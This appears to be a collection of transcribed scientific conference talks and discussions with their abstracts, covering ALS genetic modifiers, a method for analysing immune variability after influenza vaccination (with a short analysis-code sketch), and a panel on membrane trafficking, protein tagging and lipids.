Yeah, but what's the... It's a distance. In the heart, it's the way they inject, and then the cells... Yeah, but what distance do they have to cross? I think it's... I mean, this is one... Has it been tried? This is one meter. Yeah, well, stem cells... Yeah, it has been tried in China. So, I mean, and not in the best possible way, I suppose, but anyway. At a certain moment, it was a big hype in the ALS field, so people thought that they... And not for the simple reason to replace the motor neurons, but to replace the environment, the toxic environment, because, well, astrocytes and microglia also seem to play a role. So if you can replace the astrocytes, maybe then you will have a benefit. In the end, everything that they have tried failed. So, it didn't have much... I'm not excluding that it will help, but for the moment, it's not the way people are going forward, let's say, that way. Because that's a radical therapy. Yeah, but here, I mean, an axon... Well, we are so happy that we can bridge... In the culture, we can bridge maybe... Well, it's a few hundred micrometers, eight hundred micrometers, I think. And that is already a challenge. So how can you get it one meter? I mean, hopefully, well, yeah. Hopefully, I wouldn't... Yeah. You know, in other neurons, mRNA translation is mostly concentrated at the synapse, right? So the question here, I don't know about motor neurons. 
Yeah, yeah, yeah. Yes, yes, indeed. You don't need to travel, you don't have to. Yeah, absolutely. No, no, there is clearly translation... There is clearly translation here at the synapse, for the simple reason: if something has to be made here, and the message has always to come from the nucleus, that will take too much time. So if there is something needed here to react very fast to whatever situation, local translation is the only way to do that. And there is RNA there, so that's... And there is RNA transport as well. Okay, thank you. Thank you very much.
|
The increasing number of patients suffering from neurodegenerative diseases in our aging Western society is becoming a major burden to our social care system. There is currently no cure for any of these disorders. This lack of effective therapies is in large part due to an insufficient understanding of the etiology and pathogenesis of neurodegenerative disorders. One of the most dramatic neurodegenerative disorders is amyotrophic lateral sclerosis (ALS). It is a fatal neurodegenerative disorder primarily affecting the motor system. The disease presents with progressive muscle weakness and median survival is limited to 36 months after the disease onset. No effective therapies exist. In about 10% of the patients, ALS is a familial disorder. Mutations in 4 different genes (C9orf72, SOD1, TARDBP and FUS) explain a large proportion of these, but the cause of the disease remains enigmatic for the majority of patients. Over the last 2 decades, multiple clinical trials had only negative results, in part because our understanding of the disease mechanisms is insufficient to define clear therapeutic targets. Even in the light of an unknown disease cause, a better understanding of the molecular mechanisms that affect the severity of the disease would greatly advance the ALS field. A considerable degree of heterogeneity exists between patients in terms of both the age of onset and the disease progression rate. This suggests that important genetic modifiers exist. Modifiers of disease progression in ALS are candidate targets for therapeutic interventions. Within the Project MinE consortium, whole genome sequencing (WGS) has already been performed on almost 5000 ALS patients and more than 2000 controls. This international collaborative effort is unprecedented and uses state-of-the-art technology for WGS. The analysis of modifiers of age of onset and of survival across the whole consortium will provide information on genetic modifiers. The hits are prioritized based on the likelihood of being detrimental at the protein and regulatory level using various bioinformatic prediction tools. Subsequently, validation of these hits is performed in vitro and in vivo. In vitro models consist of different cell types derived from induced pluripotent stem cells (iPSCs) from ALS patients. In vivo models range from Drosophila and zebrafish to rodents. By performing all these experiments, we will get a better understanding of the molecular mechanisms underlying the disease that could also be responsible for the wide range in age of disease onset and survival after disease onset. Altogether, this could pave the way for the development of novel therapeutic strategies to treat ALS.
|
10.5446/50896 (DOI)
|
And it is known that different people show different immune responses to the same immunological perturbations, such as pollen or vaccines. For example, only a fraction of people is allergic to pollen, or some people respond well to vaccines, but others don't respond so well. So the question is, how different they are? How different are they? And why are they different? And the approach of population immunology that measures a lot of people and immune responses over the course of time can potentially answer this question. So it's immediately different, because people say the immunological responses that are allergic, they're instantaneous. But the immune response takes about three weeks, while it's immunological. The allergy is instantaneous and people have it, you know, at the first exposure. So you don't even have time to develop any immune reactions. So why is it called immunology? Okay, so I agree that these two types of responses are different, immunologically different, but they share some characteristics, because they are related to some genetic background related to... Genetic here, but why they're both... Not even logical, they sound like a cancer. Okay, so maybe I can answer the general questions later. No, no, it's still, I mean, just answer, because it's confusing. It's not immunological. It is, it is. It is immunological. It's a different immune pathway, it's still immunological. So it's an immune system which always reacts to anything, yeah? It's not learned. So one is ready to go, or it has to be built, and then it goes. Okay. Thank you. And so I'm interested in the approach of population immunology. And we are... This time we examined a cohort of 300 volunteers who cooperated with us and received seasonal influenza vaccine in 2011. The cohort consisted of 100 males and 200 females, age 32 to 66, so they are middle-aged people. And we used trivalent inactivated influenza vaccine containing hemagglutinin proteins of these virus strains. So they are very usual ones. And we collected peripheral blood on four time occasions, namely before vaccination and one day after and one week after, or three months after, vaccinations. And we analyzed these blood samples. And individual blood samples were split into two tubes. One tube was used for measuring six B cell markers like this. The other tube was used for measuring T cell markers like this. So as you see, they are very general markers classifying the basic subsets of B cells and T cells. And in flow cytometry, each of these markers is measured for each single cell in the blood. So what we get is a point cloud of cells in a multi-dimensional space. So seven axes, seven dimensions for T cells and six dimensions for B cells. And usually in immunology studies, we select only two axes and show two dimensional plots like this. But please note that this is only a fraction of a much bigger picture. So to analyze this multi-dimensional space, we devised a new method called LAVENDER. LAVENDER is intended to uncover the latent axes that can explain the variability of the dataset. Suppose we have four samples showing these kinds of immunological distributions. And looking at these pictures, you might think that the top two pictures might be somewhat similar because they belong to the same participant number three. But they might be a little bit different from the bottom two pictures which belong to the participant number six. So we want to quantify these differences and for that we follow the four steps. 
In step one, we perform density estimation of these point clouds. So these raw data are very complicated. So we determine a grid and calculate the density of cells using the k-nearest neighbors method. That amounts to basically smoothing the distribution. And this method is non-parametric. That means it doesn't presuppose any distributions, be it normal or Poisson or uniform. So it can deal with any complex shape of point clouds in an unbiased manner. And in step two, we measure distances between distributions using the concept of Kullback-Leibler divergence from information science. And we give it a little trick to make it a genuine bona fide metric. And we use the, actually we use the Jensen-Shannon distance. And in a nutshell, it tends to emphasize the accumulated peaks and focus on accumulated peaks and tries to measure the intensity or the positions of these accumulated peaks. But other distances, if you like, can be used. And in step three, based on the distances we just measured, we reconstruct samples in a new coordinate space that we call LAVENDER space. That uses the algorithm of multidimensional scaling. And like this. So the distances between points reflect the distances between original samples. So this is a huge dimensionality reduction from the very complicated raw data to just two or three dimensions. And then we can analyze axes in this LAVENDER space. So this is a result of dimensionality reduction for B cell samples and T cell samples. So as you can see, each dot corresponds to each sample taken from participants. And different colors denote different days. Zero, day one, day seven, day ninety, in which samples were taken. And it might be difficult to see, but you see that the same color, the same day samples form a cluster, but they are somewhat dispersed in a certain direction. And this trend is the same for T cells. Samples from the same day form a cluster, like the black ones, but they are dispersed. And this is a two dimensional projection that is easier to see. And we see that intuitively. And for these examples, the horizontal axis corresponds to the time-dependent axis that shows the difference between days, and the vertical axis corresponds to the individuality axis that shows the variability between samples, same-day samples. This applies to T cells as well. This time the vertical axis is more related to time. And the horizontal axis shows the variability or individuality between samples. So these are very simple intuitive arguments, but we can make it rigorous by using tensor decomposition. So tensors are basically, in this context, just three-dimensional versions of matrices, having dimensions of participants, different days, and LAVENDER coordinates. And this tensor can be decomposed into more simple rank-one tensors like this, actually a sum of rank-one tensors. It's called CP decomposition. So if you look at each component and see the days component. So this is an ideal case, but if the days component is time dependent, this component can be considered to be time dependent. And if it is not dependent on time, it can be considered to be time independent. And actually, we were able to separate the LAVENDER coordinates into time-dependent and individuality axes using tensor decomposition. So we analyze the individuality axis and follow it over time. And first we separated the participants into two groups based on the value of the individuality axis on day zero. 
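For readers who want to see the steps above in code, here is a minimal, hedged Python sketch of a LAVENDER-style pipeline, assuming each sample is an (n_cells x n_markers) array of flow-cytometry events; the grid resolution, the choice of k, and the use of scikit-learn and scipy are illustrative assumptions, and the Jensen-Shannon distance stands in for the "Kullback-Leibler divergence with a trick to make it a metric" described above.

```python
import numpy as np
from itertools import product
from sklearn.neighbors import NearestNeighbors
from sklearn.manifold import MDS
from scipy.spatial.distance import jensenshannon

def knn_density_on_grid(cells, grid, k=50):
    """Step 1: non-parametric density at each grid point, proportional to
    k / (volume of the ball reaching the k-th nearest cell). No distributional
    assumptions (normal, Poisson, uniform) are made."""
    n, d = cells.shape
    nn = NearestNeighbors(n_neighbors=k).fit(cells)
    r_k = nn.kneighbors(grid)[0][:, -1]           # distance to the k-th nearest cell
    dens = k / (n * np.maximum(r_k, 1e-12) ** d)  # d-ball volume constants cancel below
    return dens / dens.sum()                      # normalize so densities are comparable

def lavender_embedding(samples, n_grid=6, k=50, n_components=2):
    """samples: list of (n_cells x n_markers) arrays sharing the same markers.
    A coarse grid keeps the number of grid points manageable for 6-7 markers."""
    stacked = np.vstack(samples)
    axes = [np.linspace(lo, hi, n_grid)
            for lo, hi in zip(stacked.min(axis=0), stacked.max(axis=0))]
    grid = np.array(list(product(*axes)))         # common grid for all samples
    dens = [knn_density_on_grid(s, grid, k) for s in samples]
    # Step 2: pairwise distances between the estimated densities
    m = len(samples)
    dist = np.zeros((m, m))
    for i in range(m):
        for j in range(i + 1, m):
            dist[i, j] = dist[j, i] = jensenshannon(dens[i], dens[j])
    # Step 3: reconstruct the samples in a low-dimensional "LAVENDER space"
    mds = MDS(n_components=n_components, dissimilarity="precomputed", random_state=0)
    return mds.fit_transform(dist)
```

The time-dependent versus individuality split described next would then come from stacking the embedded coordinates into a (participants x days x coordinates) array and applying a CP/PARAFAC decomposition, for example with a tensor library; that last step is omitted from this sketch.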
So group one has a lower value of the individuality axis, whereas group two people have higher values. And as we follow over time, the axis, the value of the axis is relatively stable, which means that group one people tend to stay low, whereas group two people tend to stay high, even, but with occasional switching orders for these cells. And this trend is more conspicuous in T cells, where the grouping along the individuality axis is more stable than for the B cell samples. And we further looked at, we tried the biological characterization of the axis at day zero, and we found that when we looked at white blood cell differential counts, group one people had more lymphocytes, which are related to adaptive immunity and producing antibodies. And group two people had more neutrophils that were related to innate immunity or inflammation. So group one seems to be more ready to respond to vaccine even before vaccination. And this trend was verified when we looked at B cell subsets. And this is the lineage of B cell differentiation from immature to naive to finally to memory or antibody producing plasma cells. And we found that group one people had a larger fraction of plasma cells than group two, supporting that group one people are more ready to respond. So to conclude, we analyzed variability in the immune system in a cohort of 300 volunteers who received seasonal influenza vaccine. And our LAVENDER analysis enables us to extract critical axes of individuality in an unsupervised and unbiased manner. In fact, in our data set, it uncovered the baseline immunological characteristics underlying the response to the vaccine, i.e. adaptive immunity dominant or innate immunity dominant. So this kind of answers the how different question. But I think that to answer the why different question, we need to look at more specific genes or specific subsets that were discovered in our data set. So I would like to acknowledge coauthors, especially Daigo Kadaf, a graduate student in Yabba, the lab, the Yama lab. And Dr. Seto, who is an immunologist who performed experiments in the Matsuda lab. Thank you very much. I don't think I understood, because what you showed is that there are different populations that are more, basically different immune profiles. But I didn't see the connection between that and how they are responding to the vaccination. And so, it also ignores that the patients would have been exposed in different ways to the flu historically when they were children, etc. So that connection is not there. So how to evaluate the output is an important question. And we measure the output of this system using the antibody titers. But unfortunately, the antibody titers were not in clear linear correlations with these coordinates we measured. But as you mentioned, these same antibody titers are more correlated with vaccination history. That is reported in other studies as well. So the people who have never been vaccinated show the larger response to the vaccination. And I think, in my opinion, the antibody titers are an accumulation of the workings of plasma cells. So that's kind of an integration. So I don't think it's so unnatural if the antibody titers don't show linear relationships with what we do. So our coordinates are correlated with the fraction of plasma cells, but are not directly correlated with antibody titers. So that's maybe, as you said, there may be a difference in concepts or what we... So yeah, and we need to be more specific in discussing these results, I think. 
It's related to this question. So as you move this, how do you define the T and B cell populations? They are very heterogeneous populations. How do I define which populations? T and B cells. Yeah, so there are a large number of studies related to defining various subsets of B cells and T cells, which should I use? And they are just very basic ones. And for example, in a recent study, you've shown that vaccination efficacy is related to the specific subset called follicular helper T cells. That was not measured in this study. So I agree that this study is kind of simplistic in terms of immunology, but we think that the same method can be used for analyzing more detailed data. One more question. You have group one and two. Do they correlate with age? So that could be a bit correlated? No, there are no... at least statistically no difference between group A and group B. And I found that one... I don't remember which one that was, but one curve showed a very volatile movement. That was a young female. Young females... my delusional idea is that young females are more prone to... so immunological... more active maybe, immunologically. Alright, thank you very much, Nintoshi. Thank you very much.
|
The human immune system is known to be highly variable among individuals, but it is not well understood how the variability changes over time, especially when faced with external perturbations. Here we analyzed individual variability in the immune system in a cohort of 301 Japanese volunteers who received the same trivalent inactivated influenza vaccine in winter 2011. To extract important variability axes from single-cell measurements in a data-driven and unsupervised manner, we devised a computational method termed LAVENDER (latent axes visualization and evaluation by nonparametric density estimation and multidimensional scaling reconstruction). It measures distances between samples using k-nearest neighbor density estimation and Jensen-Shannon divergence, then reconstructs samples in a new coordinate space, whose axes can be compared with other omics measurements to find biological information. Application of LAVENDER to multidimensional flow cytometry datasets of B and T lymphocytes (taken before and 1, 7, 90 days after vaccination) uncovered an axis related to time and another axis related to individuality. We found that the values of the individuality axis were positively correlated between different days, suggesting that the axis reflects the baseline immunological characteristics of each individual. In fact, the value of the axis before vaccination was highly correlated with the neutrophil-to-lymphocyte ratio, a clinical marker of the systemic inflammatory response; this was verified by the transcriptome analysis of peripheral blood. These results demonstrate that LAVENDER is a useful tool for identifying critical heterogeneity among similar but different single-cell datasets.
|
10.5446/50898 (DOI)
|
I want to follow up on what I started asking David in the hallway. And that is: all your localization and analysis is done with these GFP and RFP fusions. And the question is, how much are they functionally compromised, and how do you evaluate whether they're functionally compromised? In budding yeast, we have, so since my lab does both, we have much more sensitivity because, usually, you can easily make it the only copy of whatever gene, and especially you know what phenotypes there are from loss of function. You can look for genetic interactions. As I mentioned in the hallway, even I think that you always compromise function when you put a tag on a protein, and I think people try to sweep that under the rug, but you know it varies. I think in most cases you preserve the function surprisingly well. But there are things you can do, like assess the pathway. If you're looking at endocytosis, you can check your line and make sure the rates of endocytosis are normal. You can look at different components of a complex and see if they have similar behavior. I think you always need to be cautious when you've generated like 120 lines. Yeah, well, many more in yeast. That's mammalian lines. Yeah. The mammalian ones, you know, they're diploid, so if you tag, or if they're HeLa cells, they have six copies. How many copies you tag can definitely make a difference. Actually, at the Allen Institute, so I'm a senior investigator or whatever, I have some role at the Allen Institute, where they're doing this very systematically and very rigorously. They find that for some genes they don't recover any diploid. When both alleles are edited, they only get single allele edited, which, the guess is that it's because it might be lethal to edit both, or at least selected against, some kind of growth disadvantage. So in that case, actually, what we've done in mammalian cells and what the Allen Institute tries to do is to go to experts in the field who have, like, leave it to the experts who study a process: if you tag a protein, because the Allen Institute doesn't have expertise in all the different cellular processes, they might go to your lab and say, what would you tag in the proteasome, or something like that, you know, and what evidence do you have that that was functional. But things like what linker you use can make a huge difference, night and day. So it definitely is deserving of care. What are you trying to do, to just systematically tag all the...
The Allen Institute, they're, they are tagging, so you can go to their web page, the Allen Institute for Cell Science, it's too bad Leonard isn't here, I meant to mention to him, they have, they put, they have tons of 3D imaging data for all these proteins, all the raw data is put on the web immediately so people who have the computational skills can look at the images. But they are doing, they're, they originally were going to try to tag essentially everything, but they decided instead to very thoroughly characterize all their cell lines and instead make representatives. So every major organelle is tagged already, every major cytoskeletal element, cell adhesion molecules, now they're working on signal transduction proteins, and they're all going to be in the same genetic background, and it's all available to the public at their cost, at their cost. So Berkeley has acquired the first set as a resource for people on campus, and you know it's a lot, I think, like model organisms, C. elegans or flies, where everybody in different labs, you know, is comparing the same type of cell. Which, you know, now I know in my field, even if my lab works on a HeLa cell and the lab down the hall works on HeLa cells, they're not at all the same HeLa cells, so it's not even close to a real cell exactly. So that's, you know, so that's, you know, it's time, you know, to start working on things that are more physiological. That's what I mean, that rapidly we will have somehow, in the old and stability lab, to use this kind of cells, to be sure, to publish for instance, is it, is it to be sure, I mean somehow, that everybody is talking on the same basis, is it, it would be a trend? I think it would be a positive trend. Yeah, I think it's like that, I just, I mean, I'm not in charge of all of it, you know, also by all. One more question: GFP, GFP is a very stable protein, so when you make a fusion you could stabilize a short-lived protein, and this could have an effect which is not natural, that short-lived protein could become stable, so this could be a little bit of a problem. I don't disagree with that. It's just, it's only one way to look. No, but you can test, you can test, you can look at the half-life and test. So we're on the system not by gene overexpression but stabilization. Yes, yes, and we try also, sorry, we try also to, like, when you see something with GFP, to see if it's really true, or so with immunofluorescence, where it's, no, it's endogenous. This was done to overcome the overexpression, but it's not always going to do that. Okay, somebody wanted to say something like. You have the question. Yeah, my comment: GFP is of course good, but there is a choice of different tags as well, like Halo tags or SNAP tags, so they have big advantages, like you can use the fluorophore you want, for whatever kind of photo-oxidation or FRET it's much more efficient with these tags, so I wonder why GFP is older, so maybe it was chosen because the project was started some time ago, but I'm not sure that today I would choose GFP. Yeah, I mean, we use all those tags, and some people, like the cell atlas, the Chan Zuckerberg cell atlas, they're using my GFP. The Chan Zuckerberg is doing sort of the opposite approach of the Allen Institute. 
This new center, Chan Zuckerberg, so all these rich people are starting institutes now in the US, and so they, they're using this split GFP where you put an 11 amino acid tag and then you just use a parent cell line that expresses the rest of the GFP, it makes a beta barrel, so one of the, yeah, so and then, so that's a smaller tag but it makes GFP, so there's pros and cons of different things. We had a question about first time after that. Mine is a very general one, outside of the field, and I guess mainly Judith, Alberto, maybe the others. So the transport complexes have been studied mainly in the context of their original mutant phenotypes, in other words they interrupt one step in some transport pathway. We're now starting to find them in more places. I guess, from a person who's interested in more regulatory mechanism, I'm curious how general this sort of multifunctional combinatorial mechanism is going to be. And also, we've learned quite a bit about signaling out from the transport complexes, from unfolded proteins and such. How about signaling in? I mean, what do we know about signals going into the transport machineries, which parts of the signaling machinery are regulated by what kinds of mechanisms? So the first question, I think multitasking proteins, it's an emerging theme, and the list of proteins that are known to have multiple tasks is growing. Also some proteins that we have known for a very long time already, for example I have been talking about the mannose-6-phosphate receptor that is involved in transport of lysosomal enzymes, but it's also involved in endocytosis of IGF2, and the fields that are looking at IGF2 endocytosis and at mannose-6-phosphate receptor trafficking are kind of apart, strangely enough, but it's the same receptor. And for signaling, for example, VPS3, which is part of the CORVET complex, was originally identified as TGF-beta receptor-associated protein 1, and it's a SMAD4-binding protein that is involved in the TGF-beta signaling pathway. So that is what I know, but I think that we have to be very open to this, that one protein can have multiple functions. You want to add? I agree. I think it's sort of disturbing. It would be much easier to think one function, one protein, but these moonlighting proteins appear to be very many actually. But I don't think, I don't know of any systematic database or systematic study or collection of data about this moonlighting phenomenon. You find a lot of this in the literature, so I guess there are many, but there is nothing systematic and clear done already. So for your question about the signaling-trafficking coupling, I think GLUT4 translocation is a very good example. So it's well known that AS160 can be phosphorylated by AKT in the insulin signaling pathway, but that's just a part of the story. So David James did a whole proteomic analysis and found hundreds of proteins could be phosphorylated upon insulin stimulation, and it's still open. Are these phosphorylations important or not? It's going to be a long way. At least there are some candidates so far. I think what you're asking, to me it depends on exactly what your question is. A Rab is going to do the same no matter where it is. It's going to function with a different set of proteins. An ESCRT-III complex makes filaments no matter whether it does it at the surface, whether it does it at cytokinesis or whether it does it at the surface of an endosome. It might interact with different components. So the signals don't make a circle into a square. It still remains a signal but it can change its interactors based on where it is. 
A COPII coat will make a COPII vesicle because it only functions at the ER. These are the hard-wired nuts and bolts. Sec61 will only translocate cargos, or newly synthesized proteins, at the ER. It will not do it at endosomes, for example. So you have to ask the question based on the protein you're interested in. And that can change. But certain proteins do not change their location no matter what you do to them, and they don't become something else just because they get a phosphorylation event or a glycosylation event. But maybe an easy way to solve this issue is to distinguish between the activity of a protein and its function. An enzyme is an enzyme. One activity, eventually, like an enzymatic activity or a scaffold activity. But this... An enzyme will remain. As for functions, depending on the cell type and localization it can have many outputs. But when you're looking at different pathways in the cells, the same function may influence very different processes. So that... Yeah. If you look also, Charlie Boone doesn't seem to be in the room, but his genetic interaction network, you know, I think, I can't remember, the essential proteins, I don't know, had nine interactions each, the non-essential seven, something like that, you know, which... So each protein does have many different types of interaction... functional interactions, and similarly when you do proteomics, you know, I forget, the average protein pulls out seven other binding proteins, and so... You know, some kind of hard definition of moonlighting proteins: they have completely different functions and they use different surfaces for these functions. So those are really completely different activities. I work with a protein which is involved in membrane fission. It's also a transcription factor, exactly the same problem. And the molecular mechanism is very well known, the surfaces are different and the functions are totally different. And there are a few examples, as I said before, it's not clear how many cases of these real multifunctional proteins we have, but from the literature I guess so. It's not just the change of, you know, of localization, and the same protein, the same enzymatic activity, does something in a compartment and has a different effect in another compartment, that's not a multifunctional protein. But Alberto, I beg to differ, sorry, your protein BARS is recruiting an acetyltransferase in doing the fission process, and when it's inside the nucleus it recruits an acetyltransferase to acetylate. No, it's really very well known, it's completely different. Why? Is it not recruiting? No. No, but I can say simply it's not the case, it's not true. It's not true. It's not a scaffold, it recruits. No, it doesn't recruit an acetyltransferase in the nucleus. There are many examples. There are very few examples of those. No, no, no, many. Like with the enzyme function in the nucleus, transcription factor for example. Or cytochrome C. Cytochrome C. And many times the name of a protein, you know, the history, influences how people think about it. Which function was discovered first? No, there's a canonical function and then the moonlighting activity was discovered afterwards. And sometimes it's, if you are not even sure if it's real or not, if it's direct or indirect. The question is how many of these moonlighting proteins have really been shown to directly be involved in two totally different functions? I don't know. I don't know how many. And also the definition, the criteria should be strict, otherwise a protein can do many things. It should be strict. 
Different surfaces, completely different activities. Then under those criteria I'm not sure how many there are, but several, I think. Would you call VPS3A a moonlighting protein? I don't know enough. Maybe not. I don't know what it does actually. It's not completely. Do we know? Already so I can't answer that. So all of you guys are working with some membranes in some way or another. And I think a few of you were asked about lipids and none of you talked about lipids, and I'm wondering how you feel about them, both in the, maybe why it's not relevant to your research or how maybe it is and how you're interested in that or not. Repeat the first few seconds. Lipids. No, because Patricia and I talked about lipids a lot but it was privately. I don't know. Not because. No, no, no, it's a completely different story. It's not related to this meeting. I can't wait until you talk about it. It's the nature of the lipid that's important. Something in the question is the nature of the lipid that's important for the function that you describe. I think one of the things that limit, there are many things that limit studies in the lipid field. One is that you can't monitor them in cells where they are, their dynamics, the exact position of the different species. The same way that can be done with proteins. You can label them and monitor exactly their dynamics. That's a huge advantage. I think people got two Nobel prizes. For lipids, it's a completely, there is no way, it's a completely unexplored territory. Imaging is impossible. It's a big limitation. Biochemistry can be done, but of course it can be done. But again, without imaging, you don't know where they are. For cell biologists, it's a big question that can't be answered. So Tommy is not here, but yesterday he used, I think people are using, to look at the lipids, phospholipids, phospho, to use domains of proteins that recognize the lipids specifically. But they sequester lipids. So one has to be careful. But answering his question, there are lipids that are being studied extensively, but they are usually modified lipids. Phosphoinositides, for example, the PIPs, the PIP2s and the PIP3s, diacylglycerols, they've been studied extensively. But you're talking about lipids that are present in all the membranes, the phosphatidylcholines and the serines and ethanolamines, et cetera, et cetera, et cetera. They are present in all the membranes. What changes is the concentration and their production at any given time. And that becomes very difficult to quantitate. You cannot easily manipulate them. And if you use these kinds of proteins, such as a PH domain of a protein that binds to a phosphoinositide, sure, you can monitor it. But you don't know what you do to the dynamics because you have bound something and you prevent its consumption. And there is therefore that little caveat that you have to be careful. And that is probably one of the major reasons. People think that those methods are not reliable. You can monitor lipids, one, with lipid binding proteins, but then you mess up completely the dynamics of that lipid. Or you can replace an acyl moiety with a fluorescent molecule, like a BODIPY or something. But again, it's not the same molecule. So people don't, including myself, people don't trust those data, basically. Now, things might change now with the advent of imaging mass spec, mass spectrometry. That's going to reach a resolution, it has already, but it's not commercial yet, of one square micron. 
And you can identify 300, 400 lipid species using imaging mass spec. So then you can have big pixels, but you can't get an image there. And the molecular resolution is fantastic. You can distinguish many different species of phosphatidylcholine, for instance, because they differ in the length of the acyl moieties. So that's going to come. It's here already, basically. Okay, so going off of the lipids, I was thinking, during David's talk about the math modeling of the endosome formation or whatever, I was curious whether you took, I mean, did you take into account the concentration of the different kinds of lipids that could be there and how that affects the elasticity of the membrane or something? No. We just varied parameters to do with the membrane tension. For most of those models we used, we just modeled the lipid bilayer as an elastic sheet and then varied the properties of that sheet and didn't change anything locally, which probably happens during these processes. So that would be a refinement. But you know that in terms of budding and fusion, you're cutting membranes and you're fusing membranes. And there is no space for lipids in SNARE-mediated fusion events. And there is no space for COPII- and COPI-mediated cutting. Why? Because it's just been very, very difficult. And in vitro, people kind of don't ever get to measure those things. And in vivo, it's very difficult because, unlike proteins where you can do siRNA and CRISPR and quantitate, you can't really do that with lipids. So it's been a technical challenge, not because of lack of interest or not wanting to study it. Yeah. Well, we had exactly this conversation with Dr. Sherfield this morning. She's not here. She's doing experiments. We are also doing experiments with liposomes and changing the composition of liposomes and looking at how this changes the response of certain proteins. It can be done in liposomes. You control the lipid completely. You know what's there. But when you want to translate this data into in vivo, into cell biology, you have no idea what's going on there. That's the big limitation, essentially. Now, I was going to say that I find this initiative great, to go to the primary cell and try to redefine, in terms of endocytosis and maturation of endocytic compartments, how this is happening in primary cells and not in HeLa cells, because most of what was found in HeLa cells turns out not to apply to the primary cell. However, I wanted to have your opinion on how much, could you estimate, how much of what you're going to find in the cells you're using, which are not really primary, actually, from what I understand, is going to be general, possible to be generalized. Because my feeling is that when it comes to endocytosis and endocytic vesicles, it's always defined by what it contains. And since all the cells have different activities in terms of receptors and internalization and tissues, finally, can we really find general rules on endocytosis and endocytic trafficking in general? That's the question I asked myself. So what do you tell yourself? Sorry. No, I said you asked yourself. So what do you answer? I mean, we've just looked at one process and we've found that it's remarkably different. So if you look at the literature in endocytosis, different papers using cancer cell lines report very different morphological features for endocytic sites, plaques or round vesicles, very dynamic, very slow. And it's hard to make sense of how those differences came about. Are they physiologically relevant? 
Because if they are relevant, then they're likely to be important. And then there's some kind of mechanism that adapted that process for the different cell types. And I think if you extrapolate to all the different cell types and then look in the context of a tissue, where you have cell-cell contacts, apical and basolateral surfaces, there's going to be differences that you just wouldn't be able to see when you look at things on glass. And then the fact that you can differentiate them into many different cell types. And I think these organoids are, they're imperfect now. Like they don't have a vascular system, but there's just so much effort into improving them that there's going to be a huge push in that direction. So I think all these things are complementary. I think that Tommy, looking in zebrafish, which are very translucent, and you can look in the living animal at a lot of intracellular events, those are all good things to do. Now, but this is a general problem. There are around 300 types of cells in mammals. And I guess, basically, DNA polymerase would probably be the same in all of them. But as soon as you get a little bit away from these very, very core basic functions, there's obviously a lot of difference amongst cell types. So that's also a big problem when you start to look into the physiology. You know, the physiology means that cell type in that organ, in that context, and we are not there. I mean, it's going to take many, many, many years to get there. It's possible to make transgenic mice with that protein. No, sure, but it's a huge amount of work, centuries of work. But listen. No, it is possible. No, just, yeah, just. But listen, you just love of hereditary transgenic mice. You know, if you do a mucins PubMed search, you get, I think, something like 15,000 papers or 10,000 papers. And a lot of this has been done in mice. In fact, the whole cystic fibrosis model based on the mouse system turns out to be a complete flop, because the human goblet cells of the airways are different from the goblet cells of the gut. We work on this mucin problem, and we followed the mouse for years, and it turns out the way the airways goblet cells work in our system is completely different and has nothing to do with what happens in a mouse. But some of the issues you can, coming back to the original question raised by the fellow up there in the blue shirt, some of the questions, for example, you asked about generalization. Well, we know that the basic mechanism or basic principle of endocytosis and exocytosis is conserved in yeast and in us. So some of the things are going to be conserved and there are no changes to be expected. There might be modules, you know, but the basic concept is the same. The COPs do the same thing, in yeast and flies and worms and in us. But there are certain things that yeast just does not do. I mean, they don't have bones, they don't spit, you know, they don't think. So of course, studying those things in yeast is liable to give you the wrong answer, might take you in the wrong direction. So it all boils down to what is it that you want to study, what you're capable of doing and how far do you want to stretch it. Lipids are not studied by many of us because it's blasted difficult to get at it, you know, whereas other things are relatively easy, relatively not easy, but they're just relatively easy, and people who work on proteasomes and things of that kind, they don't have to worry about their own membranes. 
You know, they're just pure blobs of proteins, so you can get away with it. So I think picking your problem carefully and knowing how far you can take it is very important. Are we done? Hold the microphone — oh, unless somebody wants to say something about the previous question. No, no, no, just — for instance, in Germany they have an enormous alliance to study the liver and liver cells. So all the data are understandable and comparable in one system; but otherwise, discussing processes like signaling or endocytosis, for instance, across different animals and different cell types is dangerous. One needs to know that. David wants to say something. He was going to — he had a really philosophical — please, David. He was complaining, yeah, he keeps asking, is this over? Okay, Vivek, you answer one more question and then you can go. Just you. So what do you think are the big questions that you still want to see answered in this field? In life? In what? In your life? Yeah. In your life. Oh, kind of. Oh, really? What's up with the field? We know the pathways, we know the mechanisms. No, we don't know the pathways. I think this is it. We don't. So what is the question? You know, folks go around telling the world that we know everything about the trafficking business, so you shouldn't be worrying about it. I mean, I'm sure David gets beaten to jelly with: don't we know everything about actin? And it turns out, well, no, not really. Why? What is it that we don't know? We don't know how actin can do what it does in so many different forms. And it's the same thing. If you just study VSVG transport, or if you just look at invertase secretion, then, yeah, maybe it's over. But if you want to look at the real stuff, then we have no understanding. And the question is, do you want to just say, well, we kind of know the basics, so it's over, or do you want to say, no, it isn't. I mean, if you were to talk to George Palade when he was alive, he used to say — sometimes, not always — don't we already know everything? And Jim Rothman said in five years we'll have figured out everything. Well, we haven't. We don't. So the question is, do we want to know more players? You're suggesting, you know, that we pick a problem and solve it, whether that requires new players, knowing lipids, doing stuff in organoids, doing stuff in, you know, whatever — just solve it at whatever level. I mean, it's as simple as that. I have, of course, an opinion here. The answer has been around for too long, and it's complexity. What we don't understand is the complexity of the biological system. That's systems biology. We have been talking about systems biology for 20 years or so, and it's been disappointing. But the thing is, that's the real problem, and it has taken a lot of time and it's going to take more time, but it's the real frontier for the next, I think, 10 or 20 years: complexity. Well, I think it's clear what complexity means. It's how the systems work, not the nuts and bolts. Well, now you mentioned Jim Rothman. He's a person who tried to simplify everything. I remember he once mentioned autophagy — he thought it's just one branch of the secretory pathway. I'm not sure Mark heard about that. But in the end, it was much more complicated than that. They earned a Nobel Prize for it a couple of years ago. So in my opinion there are probably going to be many, many more — not only players, but also pathways. We just don't know.
